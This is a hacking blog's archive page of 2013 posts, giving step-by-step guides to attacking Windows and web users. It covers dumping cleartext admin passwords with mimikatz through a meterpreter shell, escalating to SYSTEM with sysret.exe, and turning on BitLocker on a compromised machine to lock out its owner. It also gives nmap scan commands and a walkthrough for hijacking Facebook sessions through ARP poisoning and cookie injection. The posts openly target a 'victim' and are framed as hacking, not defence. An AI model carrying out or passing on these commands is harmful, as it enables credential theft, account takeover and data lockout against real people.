Skip to main content

Posts

Showing posts from November, 2013

Dumping Remote Windows Admin Password in clear text

Step1: Hack Win-7 and get the meterpreter shell. (As I demonstrated in the previous Post) Step 2: Now gain system level privileges (using sysret.exe method, as demonstrated in the previous Post)  Step 3 Type the following commands inside the meterpreter shell: upload <path of mimikatz.exe> c:\\ upload <path of sekurlsa.dll> c:\\ Step 4: Get into windows command prompt by typing " shell " command Then get the mimikatz shell by typing " mimikatz " into the command prompt *note: first navigate to the directory where mimikatz is uploaded. Step 5: Now type the following commands: privilege::debug inject::process lsass.exe sekurlsa.dll sekurlsa::logonPasswords full     After typing the third command you can view the clear text password on your screen :)

PostExploitation : Turning On BitLocker on the remote system :)

Step 1: Hack Win-7 and get the meterpreter shell. (As I demonstrated in the previous Post) Now gain system level privileges (using sysret.exe method, as demonstrated in the previous Post) Step 2: Type " shell " to get the command prompt of the remote system. Type " manage.bde -status " to get the current status of BitLocker. Step 3:  Type the following command to turn on the bit locker on any drive: manage-bde -on <drive letter to encrypt>: -RecoveryKey c:/windows/system -RecoveryPassword   Encryption process is in progress now.......... :)

Some Useful Nmap commands

CYBERATOR 1: Scan a single host or an IP address (IPv4) ### Scan a single ip address ### nmap 192.168.1.1 nmap cyberator.in nmap -V cyberator.in (detailed output) 2: Scan multiple IP address or subnet (IPv4) nmap 192.168.1.1 192.168.1.2 192.168.1.3 ## works with same subnet i.e. 192.168.1.0/24 nmap 192.168.1.1,2,3     You can scan a range of IP address too: nmap 192.168.1.1-20   You can scan a range of IP address using a wildcard: nmap 192.168.1.*   Finally, you scan an entire subnet: nmap 192.168.1.0/24   3: Read list of hosts/networks from a file (IPv4) The -iL option allows you to read the list of target systems using a text file. This is useful to scan a large number of hosts/networks. Step 1: Create a text file as follows: cat > /tmp/network.txt Sample outputs: techbharat.org 192.168.1.0/24 192.168.1.1/24 10.1.2.3 localhost     The syntax is: nmap -iL /tmp/network.txt     4: Excluding hosts...

Post Exploitation: Gaining System Level Privilege of compromised Win-7 System

Step 1: CYBERATOR Hack Win-7 and get the meterpreter shell. (As I demonstrated in the previous Post) My current Privileges are: Step 2: Download the following Resources: Sysret.exe MinHook.x64.dll Now Upload these files to the Victim's Computer using the following Command: upload <path where Sysret.exe is kept> . upload <path of  MinHook.x64.dll> . Step 3: Inside meterpreter shell type " ls " to list all the ongoing process. Note down the PID of explorer.exe .                   ( 1404 my this case) Step 4: Type " shell " to get into the command prompt of the victim's computer. Then type the following command inside the command shell: sysret.exe -pid 1404        <type the pid of explorer.exe as shown in your system...in my case its 1404> Press " ctrl+c " to terminate c...

Hacking Facebook using wireshark

Step 1: CYBERATOR Download Following Tools and Scripts: Cain and Abel (http://www.oxid.it/cain.html) Wireshark (http://www.wireshark.org/download.html) Mozilla Add-ons : GreaseMonkey (Search in Mozilla add-ons) Cookie Injector Script (http://userscripts.org/scripts/source/119798.user.js) Step 2: Open Cain & Abel Navigate to “Configure” menu and open configuration Dialog and check the configuration settings…  Step 3:  Click on (Start/Stop) Sniffing button.  Click tab.  Click on button.  Now, the following window will appear…. Now Click on OK button…..Scanning Starts Step 4:  Switch to tab listed below.  Click on Button, a pop-up window will appear.  Now Select the IP Address of the victim from the left panel of window and the Router IP in the right  panel…..as shown below: Click OK button. Step 5:  Select the IP in the table.  Click on butto...